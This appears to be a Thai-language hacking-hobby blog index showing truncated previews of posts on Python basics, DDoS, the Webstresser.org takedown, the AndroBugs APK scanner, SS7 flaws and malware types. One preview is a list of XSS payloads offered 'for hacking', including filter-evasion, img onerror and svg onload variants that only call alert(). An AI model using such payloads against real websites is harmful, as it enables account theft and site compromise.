DedSec CyberTeam TH

มาเรียนการเขียนโปรแกรมด้วยภาษา python กันเถอะ     ก่อนที่เราจะมาเข้าเรื่อง ผมขอแนะนำตัวก่อนนะครับเพราะอาจจะมีบางคนติดตามผมมานานแต่ไม่รู้จักตัวสักที ผมชื่อนายฐิติกร พุมมา ชื่อเล่น เบล หรืออีกชื่อหนึ่งว่า zero ผมเป็นนักเรียนชั้นมัธยมศึกษาปีที่ 3 ผมมีความสามารถเขียนโปรแกรม และเจาะระบบเล็กน้อย     ในตอนนี้ผมก็จะมาสอนการเขียนโปรแกรมด้วย ภาษา python แต่ก่อนอื่นเราต้องมา ทำความรู้จักกันก่อนว่า ภาษา python คืออะไร ภาษา python คืออะไร    ภาษา python เป็นภาษาในการเขียนโปรแกรมรูปแบบหนึ่ง เป็นภาษาที่เขียนง่าย และง่ายต่อการพัฒนาโปรแกรม ซึ่งส่วนใหญ่จะใช้ในการเขียนโปรแกรมบอทมากกว่า และภาษา python ก็ได้ชื่อว่าเป็นภาษาของแฮกเกอร์ เพราะโปรแกรมเจาะระบบส่วนใหญ่ เขียนด้วยภาษา python วิธีติดตั้งภาษา python    ก่อนที่เราจะมาลงมือเขียนโปรแกรมคอมพิวเตอร์ เราต้องติดตั้งตัวโปรแกรม python เพื่อให้โปรแกรมที่เราเขียนทำงานได้บนระบบปฎิบัติการของคุณ ไม่ว่าจะเป็น ระบบปฏิบัติการ Windows ระบบปฏิบัติการ Linux หรือ ระบบปฏิบัติการ Android ระบบปฏิบัติการ Windows ให้ทำการดาวน์โหลดตัวโปรแกรม python โด

  หากจะพูดถึง Dos ทุกคนอาจนึกถึงการยิงเน็ตบ้าน หรือการยิงเว็บไซต์ให้มันล่มหรือใช้งานไม่ได้ แต่ที่จริงแล้ว มันไม่ได้มีแต่การยิงเน็ตเท่านั้น ที่จะทำให้เว็บล้ม หรือเน็ตบ้านใช้งานไม่ได้    ก่อนที่เราจะมาพูดถึงวิธีโจมตี เรามาทำความรู้จักก่อนว่า DDos คืออะไร Dos คืออะไร   DDod หรือ Denial of Service  ใน วิชาการคอมพิวเตอร์   การโจมตีโดยปฏิเสธการให้บริการ   เป็นความพยายามทำให้เครื่องหรือทรัพยากรเครือข่ายสำหรับผู้ใช้เป้าหมายใช้บริการไม่ได้ เช่น ขัดขวางหรือชะลอบริการของแม่ข่ายที่เชื่อมโยงกับ อินเทอร์เน็ต อย่างชั่วคราวหรือถาวร ส่วน   การโจมตีโดยปฏิเสธการให้บริการแบบกระจาย  ( distributed denial-of-service (DDoS) attack ) คือการโจมตีดังกล่าวซึ่งแหล่งต้นทางเป็นเลขที่อยู่ไอพีมากกว่าหนึ่งหมายเลข และมักจะเป็นพันหมายเลขฃ   อาชญากรผู้โจมตีมักมุ่งเป้าไปยังเว็บไซต์หรือบริการซึ่งตั้งอยู่ในเว็บเซิร์ฟเวอร์ที่มีการเข้าชมสูงอย่างเช่น ธนาคาร เกตเวย์ชำระบัตรเครดิต โดยมีแรงจูงใจเบื้องหลังเป็นการแก้แค้น การแบล็กเมล หรือการเคลื่อนไหวทางการเมือง เป็นต้น, และสิ่งนี้คือจุดเริ่มต้นของ Hacker ที่พยายามทำให้เซิ

XSS Payload for Hacking ครั้งที่ 1 XSS in HTML/Applications XSS Basic Basic payload < script > alert ( ' XSS ' ) < / script > < scr < script > ipt > alert ( ' XSS ' ) < / scr < script > ipt > " ><script>alert('XSS')</script> " >< script > alert ( String . fromCharCode ( 88 , 83 , 83 )) < / script > Img payload < img src = x onerror = alert ( ' XSS ' ); > < img src = x onerror = alert ( ' XSS ' ) // < img src = x onerror = alert ( String . fromCharCode ( 88 , 83 , 83 )); > < img src = x oneonerrorrror = alert ( String . fromCharCode ( 88 , 83 , 83 )); > < img src = x : alert (alt) onerror = eval (src) alt = xss > " ><img src=x onerror=alert('XSS');> " >< img src = x onerror = alert ( String . fromCharCode ( 88 , 83 , 83 )); > Svg payload < svg onload = alert ( 1 ) > < svg / onload

    กองกำลังตำรวจจากนานาชาติ พร้อมด้วยตำรวจสากล ได้บุกเข้าจับกุมเจ้าของเว็บไซต์ Webstresser.org ซึ่งเป็นเว็บคนกลาง (marketplace) ในการค้นหาและใช้บริการยิง DDoS ที่ใหญ่ที่สุดของโลก ด้วยจำนวนผู้ใช้งานที่ลงทะเบียน 136,000 คน และมีส่วนในการโจมตีกว่า 4 ล้านครั้ง นับเฉพาะเดือนเมษายนนี้ ตำรวจสากลสามารถระบุตัวแอดมินของเว็บได้ว่าอาศัยอยู่ในแคนาดา, โครเอเชีย, เซอร์เบียและสหราชอาณาจักร ขณะที่เซิร์ฟเวอร์ตั้งอยู่ในเนเธอร์แลนด์, สหรัฐและเยอรมนี ก่อนจะมีมาตรการจัดการกับผู้ใช้ระดับสูงต่อไป ที่ทางตำรวจสากลระบุตัวได้แล้วว่าอาศัยอยู่ในออสเตรเลีย, แคนาดา, โครเอเชีย, ฮ่องกง, อิตาลี, เนเธอแลนด์, สเปนและสหราชอาณาจักร Webstresser มีลักษณะคล้ายกับเว็บอีคอมเมิร์ซ คือเป็นตัวกลางให้ผู้ขายบริการ DDoS กับลูกค้ามาเจอกัน โดยค่าใช้จ่ายในการใช้บริการอาจต่ำถึง 15 ยูโร (ราว 600 บาท) ต่อเดือน ซึ่งเว็บลักษณะนี้มีส่วนทำให้การโจมตี DDoS ถี่มากขึ้น โดยข้อมูลจาก Corero บริษัทวิจัยด้านความปลอดภัยระบุว่า ลูกค้าของบริษัทเจอกับการโจมตีเฉลี่ยที่ 6 ครั้งต่อวัน ที่มา : https://www.blognone.com/node/101844

  ในโพสนี้ผมจะมาสอนวิธีการหาช่องโหว่และบัคของแอพแอนดรอย ด้วย Tool ที่มีชื่อว่า Androbug Framework เพื่อทำการแก้ไข จุดบกพร่อง และป้องกันการโดนแฮกผ่านช่องโหว่ของแอพ วิธีการติดตั้ง $apt-get update && apt-get upgrade $apt-get install git -y $apt-get install python2 -y $git clone https://github.com/AndroBugs/AndroBugs_Framework.git $cd AndroBugs_Framework $chomd +x * วิธีใช้งาน $python2 androbug.py -f ชื่อไฟล์ apk ที่จะแฮก -o โฟลเดอร์ ที่จะเก็บข้อมูล

เว็บไซต์นิตยสาร Forbes รายงานว่าระบบสื่อสารโทรคมนาคมที่เรียกว่า Signalling System No. 7 (SS7) อันเป็นมาตรฐานการสื่อสารที่พัฒนาขึ้นมาตั้งแต่ปี 1975 มีช่องโหว่ร้ายแรงที่สำคัญ ซึ่งทำให้แฮกเกอร์สามารถหลอกผู้ให้บริการโทรคมนาคม (ในที่นี้คือโทรศัพท์เคลื่อนที่) ว่าโทรศัพท์มือถือของตนเองนั้นมีหมายเลขเดียวกับเครื่องเหยื่อเป้าหมายที่จะถูกโจมตี ทำให้แฮกเกอร์สามารถทำได้ทั้งรับสาย รับข้อความ SMS แทนเจ้าของเครื่องตัวจริง (ว่าง่ายๆ คือ hijack โทรศัพท์กันที่ระดับหมายเลข) พร้อมกับเผยแพร่วิดีโอสาธิตการโจมตีด้วย ช่องโหว่ดังกล่าวนี้ถือว่ามีความน่ากังวล เพราะไม่ได้ติดอยู่กับตัวระบบปฏิบัติการ และยังสามารถขยายไปดักฟังข้อมูลอื่นๆ ได้ด้วย ที่น่ากังวลคือมีหลายบริษัท (ล่าสุดเป็นบริษัทด้านความปลอดภัยจากอิสราเอล) เสนอบริการสอดแนมโดยใช้ช่องโหว่ในตัว SS7 และขายเครื่องมือเหล่านี้ให้กับหน่วยงานหรือคนที่สนใจใช้ด้วย (แต่ราคาก็ไม่ใช่ว่าจะหาซื้อกันง่ายๆ เพราะหลักล้านดอลลาร์สหรัฐขึ้นไปทั้งสิ้น) รวมถึงช่องโหว่เหล่านี้เป็นเรื่องที่วงการผู้เชี่ยวชาญทราบกันดีอยู่แล้ว (ทราบกันมาตั้งแต่ 2015) แต่ไม่มีใครทำอะไรได้เพราะปัญหาในระบบท

Virus Computer and Android Phone virus คือ โปรแกรม หรือ แอพพิเคชั่น ที่ประสงค์ร้าย จะทำลาย/ขโมยข้อมูล หรือทำให้ HardWare เสียหาย ชนิดของไว้รัส 1.Trojan คือไวรัสที่จะทำหน้าที่เป็นตัวเชื่อมทำให้แฮกเกอร์ สามารถควบคุมหรือขโมยข้อมูลของเครื่องเหยื่อได้ 2.Runsomware หรือไวรัสเรียกค่าไถ่ คือไวรัสที่ถูกสร้างขึ้นมาเพื่อเอาไว้ล็อกไฟล์ แฮกเกอร์ใช้มันล็อกไฟล์ในเครื่องเหยื่อ แล้วเรียกร้องให้จ่ายเงินมา เพื่อเป็นค่าไถ่ไฟล์ 3.WormInternet หรือ หนอนอินเตอร์เน็ต คือ ไวรัสที่จะอยู่ในอินเตอร์เน็ตคอยชอนใชเข้าเครื่องของเหยื่อ ด้วยการหาช่องโหวระบบ หรือด้วยการหารหัส(Brute Force) ไวรัสชนิดนี้ ทางกองทัพชอบใช้เพื่อทำลายโครงสร้างเพื่อฐาน และการคมนาคม ของประเทศศัตรู 4.Keyloggers คือไวรัสที่แฮกเกอร์ใช้เพื่อดัก Usernames และ Password ไวรัสชนิดนี้ จะฝังอยู่ในคีบอร์ด โดยไวรัสชนิดนี้จะบันทึกสิ่งที่เหยื่อพิมพ์แล้วส่งให้แฮกเกอร์หรือมิจฉาชีพ วิธีป้องกัน 1.ดาวโหลดและอัพเดตแอพ/โปรแกรมป้องกันไวรัส 2.อย่าดาวโหลด Add-on เบาเซอร์เยอะเกินความจำเป็น เพราะจะทำให้ช่องโหวระบบเยอะตาม 3.ถ้าเป็นไปได้  อย่ารูทเครื่อ